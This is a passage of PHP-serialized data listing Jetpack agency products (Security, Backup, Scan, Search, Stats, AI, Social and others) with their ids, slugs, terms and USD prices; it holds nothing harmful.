(10GB)\";s:12:\"product_slug\";s:30:\"a4a_jetpack_security_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:30:\"a4a_jetpack_security_t1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:31:\"a4a_jetpack_security_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3305;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:31:\"a4a_jetpack_security_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:30:\"a4a_jetpack_security_t1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:30:\"a4a_jetpack_security_t2_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3306;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:30:\"a4a_jetpack_security_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:30:\"a4a_jetpack_security_t2_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:31:\"a4a_jetpack_security_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3307;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:31:\"a4a_jetpack_security_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:30:\"a4a_jetpack_security_t2_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$19.95\";s:21:\"combined_cost_display\";s:6:\"$19.95\";s:4:\"cost\";d:19.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jpb_storage_10gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3309;s:12:\"product_name\";s:34:\"Jetpack Backup Add-on Storage 10GB\";s:12:\"product_slug\";s:28:\"a4a_jpb_storage_10gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jpb_storage_10gb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.95\";s:21:\"combined_cost_display\";s:5:\"$2.95\";s:4:\"cost\";d:2.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"a4a_jpb_storage_100gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3311;s:12:\"product_name\";s:35:\"Jetpack Backup Add-on Storage 100GB\";s:12:\"product_slug\";s:29:\"a4a_jpb_storage_100gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:29:\"a4a_jpb_storage_100gb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$5.95\";s:21:\"combined_cost_display\";s:5:\"$5.95\";s:4:\"cost\";d:5.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:595;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"a4a_jpb_storage_1tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3313;s:12:\"product_name\";s:33:\"Jetpack Backup Add-on Storage 1TB\";s:12:\"product_slug\";s:27:\"a4a_jpb_storage_1tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jpb_storage_1tb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"a4a_jpb_storage_3tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3315;s:12:\"product_name\";s:33:\"Jetpack Backup Add-on Storage 3TB\";s:12:\"product_slug\";s:27:\"a4a_jpb_storage_3tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jpb_storage_3tb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$19.95\";s:21:\"combined_cost_display\";s:6:\"$19.95\";s:4:\"cost\";d:19.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"a4a_jpb_storage_5tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3317;s:12:\"product_name\";s:33:\"Jetpack Backup Add-on Storage 5TB\";s:12:\"product_slug\";s:27:\"a4a_jpb_storage_5tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jpb_storage_5tb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"a4a_jetpack_search_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3318;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:25:\"a4a_jetpack_search_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"a4a_jetpack_search_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:4:\"$100\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:26:\"a4a_jetpack_search_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3319;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:26:\"a4a_jetpack_search_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"a4a_jetpack_search_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.25\";s:21:\"combined_cost_display\";s:5:\"$8.25\";s:4:\"cost\";d:8.25;s:18:\"cost_smallest_unit\";i:825;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"a4a_jetpack_scan_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3320;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:23:\"a4a_jetpack_scan_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"a4a_jetpack_scan_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:24:\"a4a_jetpack_scan_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3321;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:24:\"a4a_jetpack_scan_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"a4a_jetpack_scan_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jetpack_anti_spam_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3322;s:12:\"product_name\";s:17:\"Jetpack Anti-Spam\";s:12:\"product_slug\";s:28:\"a4a_jetpack_anti_spam_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_anti_spam_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:29:\"a4a_jetpack_anti_spam_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3323;s:12:\"product_name\";s:17:\"Jetpack Anti-Spam\";s:12:\"product_slug\";s:29:\"a4a_jetpack_anti_spam_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_anti_spam_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jetpack_backup_t1_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3324;s:12:\"product_name\";s:21:\"Jetpack Backup (10GB)\";s:12:\"product_slug\";s:28:\"a4a_jetpack_backup_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_backup_t1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:29:\"a4a_jetpack_backup_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3325;s:12:\"product_name\";s:21:\"Jetpack Backup (10GB)\";s:12:\"product_slug\";s:29:\"a4a_jetpack_backup_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_backup_t1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jetpack_backup_t2_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3326;s:12:\"product_name\";s:20:\"Jetpack Backup (1TB)\";s:12:\"product_slug\";s:28:\"a4a_jetpack_backup_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_backup_t2_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$143.40\";s:21:\"combined_cost_display\";s:7:\"$143.40\";s:4:\"cost\";d:143.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:14340;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$11.95\";}s:29:\"a4a_jetpack_backup_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3327;s:12:\"product_name\";s:20:\"Jetpack Backup (1TB)\";s:12:\"product_slug\";s:29:\"a4a_jetpack_backup_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_backup_t2_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"a4a_jetpack_videopress_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3328;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:29:\"a4a_jetpack_videopress_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:29:\"a4a_jetpack_videopress_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:30:\"a4a_jetpack_videopress_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3329;s:12:\"product_name\";s:18:\"Jetpack VideoPress\";s:12:\"product_slug\";s:30:\"a4a_jetpack_videopress_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:29:\"a4a_jetpack_videopress_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"a4a_jetpack_stats_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3330;s:12:\"product_name\";s:13:\"Jetpack Stats\";s:12:\"product_slug\";s:24:\"a4a_jetpack_stats_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:24:\"a4a_jetpack_stats_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:4:\"$100\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:25:\"a4a_jetpack_stats_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3331;s:12:\"product_name\";s:13:\"Jetpack Stats\";s:12:\"product_slug\";s:25:\"a4a_jetpack_stats_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:24:\"a4a_jetpack_stats_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.33\";s:21:\"combined_cost_display\";s:5:\"$8.33\";s:4:\"cost\";d:8.3300000000000000710542735760100185871124267578125;s:18:\"cost_smallest_unit\";i:833;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:26:\"a4a_jetpack_monitor_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3332;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:26:\"a4a_jetpack_monitor_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:26:\"a4a_jetpack_monitor_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.64\";s:21:\"combined_cost_display\";s:6:\"$14.64\";s:4:\"cost\";d:14.6400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:1464;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$1.22\";}s:27:\"a4a_jetpack_monitor_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3333;s:12:\"product_name\";s:15:\"Jetpack Monitor\";s:12:\"product_slug\";s:27:\"a4a_jetpack_monitor_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:26:\"a4a_jetpack_monitor_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$1.00\";s:21:\"combined_cost_display\";s:2:\"$1\";s:4:\"cost\";i:1;s:18:\"cost_smallest_unit\";i:100;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:24:\"a4a_jetpack_boost_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3334;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:24:\"a4a_jetpack_boost_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:24:\"a4a_jetpack_boost_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"a4a_jetpack_boost_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3335;s:12:\"product_name\";s:13:\"Jetpack Boost\";s:12:\"product_slug\";s:25:\"a4a_jetpack_boost_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:24:\"a4a_jetpack_boost_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:21:\"a4a_jetpack_ai_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3336;s:12:\"product_name\";s:10:\"Jetpack AI\";s:12:\"product_slug\";s:21:\"a4a_jetpack_ai_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"a4a_jetpack_ai_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:22:\"a4a_jetpack_ai_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3337;s:12:\"product_name\";s:10:\"Jetpack AI\";s:12:\"product_slug\";s:22:\"a4a_jetpack_ai_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:21:\"a4a_jetpack_ai_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.33\";s:21:\"combined_cost_display\";s:5:\"$8.33\";s:4:\"cost\";d:8.3300000000000000710542735760100185871124267578125;s:18:\"cost_smallest_unit\";i:833;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jetpack_social_v1_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3338;s:12:\"product_name\";s:14:\"Jetpack Social\";s:12:\"product_slug\";s:28:\"a4a_jetpack_social_v1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jetpack_social_v1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:29:\"a4a_jetpack_social_v1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3339;s:12:\"product_name\";s:14:\"Jetpack 